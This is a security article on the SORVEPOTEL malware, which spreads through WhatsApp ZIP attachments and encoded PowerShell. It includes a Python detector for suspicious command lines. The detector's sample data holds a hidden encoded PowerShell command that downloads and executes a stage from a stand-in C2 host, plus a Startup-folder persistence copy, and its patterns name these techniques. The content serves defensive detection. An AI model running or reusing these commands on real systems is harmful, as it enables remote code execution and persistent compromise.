In early September 2025, cybersecurity researchers identified a sophisticated malware campaign targeting Windows systems through WhatsApp messages. The malware, dubbed SORVEPOTEL, employs social engineering tactics to propagate itself, posing a significant threat to enterprise networks.
Initial Discovery and Attack Vector
The campaign was first observed in Brazil, where attackers sent phishing messages via WhatsApp containing malicious ZIP file attachments. These files bore names like RES-20250930112057.zip or ORCAMENTO114418.zip, designed to appear as legitimate documents such as receipts or budget reports. The messages urged recipients to “baixa o zip no PC e abre” (download the ZIP on the PC and open it), explicitly targeting desktop users to maximize the malware’s reach within enterprise environments.
Alternative Delivery Methods
Further analysis by cybersecurity firm Trend Micro revealed that the attackers also utilized phishing emails to distribute the malware. These emails, often masquerading as communications from trusted institutions, carried similarly named ZIP attachments with subjects like ComprovanteSantander-75319981.682657420.zip. This multi-channel approach increased the likelihood of successful infections.
Execution and Payload Delivery
Upon extracting the ZIP file, victims encountered a deceptive Windows shortcut (.LNK) file. Executing this file triggered a hidden PowerShell script designed to download and execute the primary malware payload from attacker-controlled domains. The attack chain involved:
1. Encoded Command Execution: The .LNK file invoked an encoded command that launched a batch script in a concealed window.
2. Persistence Mechanism: The script copied itself into the Windows Startup folder to ensure it ran at each system startup.
3. Payload Retrieval: Through a series of Base64-encoded PowerShell commands, the malware generated URLs pointing to command-and-control (C2) servers and used `Net.WebClient` to fetch additional components, which were then executed in memory.
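The three stages above leave a recognisable footprint in process command lines: a Base64 -EncodedCommand, a hidden window, Net.WebClient download calls and a copy into the Startup folder. The following detector is an added example (not tooling from the report or from Trend Micro) that decodes the encoded argument and scores command lines against those indicators; the indicator weights, the threshold and the sample command lines are constructed for the demonstration.

```python
import base64
import re

# Indicators from the chain described above (added example, not the report's own tooling): encoded
# PowerShell, Net.WebClient download, hidden window, Startup-folder copy. Weights/threshold are assumptions.
INDICATORS = {
    "net_webclient_download": (2, re.compile(r"Net\.WebClient.*?Download(?:String|File|Data)", re.I | re.S)),
    "iex_in_memory":          (1, re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    "hidden_window":          (1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    "startup_folder":         (2, re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)),
}
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str):
    """Return the -EncodedCommand payload as text (PowerShell expects Base64 of UTF-16LE), else None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_command_line(cmdline: str) -> dict:
    """Score one process command line; the decoded payload is scanned together with the raw line."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(text)]
    score = sum(INDICATORS[n][0] for n in hits)
    if decoded is not None:  # an encoded command is itself worth noting
        hits.insert(0, "encoded_command")
        score += 1
    return {"decoded": decoded, "indicators": hits, "score": score, "suspicious": score >= 2}

def _encode_ps(script: str) -> str:  # builds sample input the way PowerShell wants -EncodedCommand
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample process command lines (not real telemetry). The first two mirror the
# stages above; the third is routine administration and must not be flagged.
SAMPLE_EVENTS = [
    "powershell.exe -w hidden -enc " + _encode_ps(
        "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://c2.example/stage2')"),
    r'cmd.exe /c copy "%TEMP%\update.bat" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"',
    "powershell.exe -NoProfile -Command Get-Service",
]

def flag_suspicious(cmdlines) -> list:
    """Return the indicator list of every command line that crosses the threshold, in input order."""
    results = (analyse_command_line(c) for c in cmdlines)
    return [r["indicators"] for r in results if r["suspicious"]]
```

In practice the command lines would come from Sysmon or Windows process-creation logging rather than the embedded list, and the weights should be tuned against a baseline of legitimate administrative PowerShell use.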
Command-and-Control Infrastructure
The attackers employed typo-squatted domains, such as sorvetenopotel.com (a play on the Portuguese phrase “sorvete no pote”), to blend malicious traffic with legitimate network flows, thereby evading basic detection mechanisms.
Propagation via WhatsApp Web
Once established on a system, SORVEPOTEL scanned for active WhatsApp Web sessions. If an authenticated session was found, the malware automatically propagated itself by sending the same malicious ZIP file to all contacts and groups associated with the compromised account. This automated spamming not only increased infection rates but also led to compromised accounts being banned for violating WhatsApp’s terms of service.
Implications and Recommendations
The SORVEPOTEL campaign underscores the evolving tactics of threat actors who combine social engineering, script-based execution, and rapid session hijacking to maximize reach and operational disruption. Unlike traditional malware focused on data theft, SORVEPOTEL prioritizes widespread distribution, highlighting a shift in attack strategies.
To mitigate the risks posed by such self-propagating threats, organizations should:
– Enforce Strict Endpoint Policies: Block unauthorized shortcuts and scripts to prevent malware execution.
– Disable Auto-Download Features: Configure messaging applications to prevent automatic downloading of attachments.
– Conduct Regular User Training: Educate employees on recognizing phishing attempts and the dangers of opening unsolicited attachments.
By implementing these measures, enterprises can enhance their defenses against sophisticated malware campaigns like SORVEPOTEL.